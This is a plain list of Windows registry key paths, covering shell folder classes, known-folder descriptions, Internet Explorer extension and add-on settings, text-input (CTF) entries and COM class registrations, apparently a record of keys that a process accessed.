HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
HKEY_CLASSES_ROOT\Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\KnownFolders
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PropertyBag
HKEY_CLASSES_ROOT\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{59031A47-3F72-44A7-89C5-5595FE6B30EE}
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\ActivityMeterTimerInterval
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\ActivityMeterDisable
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\QuickTabsThreshold
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\clsid
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDON_MANAGEMENT
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDON_MANAGEMENT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ADDON_MANAGEMENT\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ADDON_MANAGEMENT\*
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Ext
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Ext
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{2670000A-7350-4F3C-8081-5663EE0C6C49}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{2670000A-7350-4F3C-8081-5663EE0C6C49}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore\Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore\Time
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4F3C-8081-5663EE0C6C49}
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4F3C-8081-5663EE0C6C49}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\Lang0409
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\ButtonText
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\MenuText
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\MenuCustomize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\MenuStatusBar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\Extensions\CmdMapping
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\Extensions\CmdMapping\{2670000A-7350-4f3c-8081-5663EE0C6C49}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\Default Visible
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\clsid
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore\Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore\Time
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\Lang0409
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\ButtonText
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\MenuText
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\MenuCustomize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\MenuStatusBar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\Extensions\CmdMapping\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\Default Visible
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\Icon
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IEDevTools
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\IEDevTools
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksExplorer
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\LinksExplorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\ThumbnailBehavior
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Height
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\iexplore.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{03B5835F-F03C-411B-9CE2-AA23E1171E36}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{07EB03D6-B001-41DF-9192-BF9B841EE71F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{3697C5FA-60DD-4B56-92D4-74A569205C16}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{531FDEBF-9B4C-4A43-A2AA-960E8FCDC732}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{70FAF614-E0B1-11D3-8F5C-00C04F9CF4AC}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{78CB5B0E-26ED-4FCC-854C-77E8F3D1AA80}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{81D4E9C9-1D3B-41BC-9E6C-4B40BF79E35E}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{A028AE76-01B1-46C2-99C4-ACD9858AE02F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\Category\Category\{534C48C1-0607-4098-A521-4FC899C73E90}
HKEY_CURRENT_USER\Keyboard Layout\Toggle
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Language Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Layout Hotkey
HKEY_CURRENT_USER\Software\Microsoft\CTF\DirectSwitchHotkeys
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Min_Width
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Min_Height
HKEY_CURRENT_USER\Software\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
